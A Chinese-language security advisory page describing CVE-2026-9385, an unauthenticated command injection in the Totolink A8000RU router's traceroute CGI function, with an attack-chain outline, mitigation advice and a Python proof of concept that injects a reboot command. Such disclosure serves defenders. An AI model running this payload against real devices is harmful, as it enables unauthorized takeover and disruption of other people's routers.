IPBUF安全漏洞报告
English
CVE-2026-9385 CVSS 9.8 严重

CVE-2026-9385 Totolink A8000RU远程命令执行漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9385
漏洞类型
操作系统命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A8000RU

相关标签

命令注入远程代码执行TotolinkIoT安全RCE

漏洞概述

Totolink A8000RU路由器在7.1cu.643_b20200521版本的Web管理界面中存在严重的操作系统命令注入漏洞。该漏洞源于`/cgi-bin/cstecgi.cgi`文件中的`setTracerouteCfg`函数未正确过滤用户输入的`command`参数。攻击者无需认证即可通过网络发送特制的数据包,最终导致在目标设备上执行任意系统命令,完全控制设备。

技术细节

该漏洞位于Totolink A8000RU路由器的Web管理接口组件中,具体受影响的是`/cgi-bin/cstecgi.cgi`文件。在处理`setTracerouteCfg`功能的请求时,程序未能正确过滤用户输入,直接将`command`参数拼接到系统命令中执行。由于CVSS向量显示无需用户交互(UI:N)且无需认证(PR:N),攻击者可以通过网络向目标设备发送恶意的HTTP POST请求。攻击者利用分号、管道符或其他Shell元字符拼接恶意指令。当后端脚本解析该请求并调用系统函数(如`system()`)执行traceroute相关操作时,注入的恶意命令将随合法命令一起被操作系统执行。这将导致攻击者获得后台权限,进而可以进一步植入后门、窃取敏感信息或发起DDoS攻击。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出运行Totolink A8000RU且固件版本为7.1cu.643_b20200521的设备。
STEP 2
漏洞利用
攻击者构造包含恶意Shell命令的HTTP POST请求,目标指向`/cgi-bin/cstecgi.cgi`,并设置`function=setTracerouteCfg`及恶意的`command`参数。
STEP 3
命令执行
服务器端CGI脚本未对输入进行过滤,直接将恶意参数传递给系统Shell执行,导致攻击者获得系统权限。
STEP 4
后门植入与控制
攻击者利用执行的权限修改系统配置、下载恶意软件或开启反向Shell,从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual IP) target_url = "http://192.168.0.1/cgi-bin/cstecgi.cgi" # Vulnerable payload: Using semicolon to inject a command # Example: Rebooting the router or creating a reverse shell payload = { "function": "setTracerouteCfg", "command": "google.com; reboot; #" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; PoC/1.0; CVE-2026-9385)" } try: # Sending the malicious request without authentication response = requests.post(target_url, data=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Request sent successfully. Check if the device rebooted or command executed.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

Totolink A8000RU 7.1cu.643_b20200521

防御指南

临时缓解措施
如果无法立即升级固件,建议通过ACL(访问控制列表)策略禁止外部网络对路由器Web管理界面(默认80/443端口)的访问,或者在网络边界阻断针对/cgi-bin/cstecgi.cgi路径的请求,直至完成固件更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表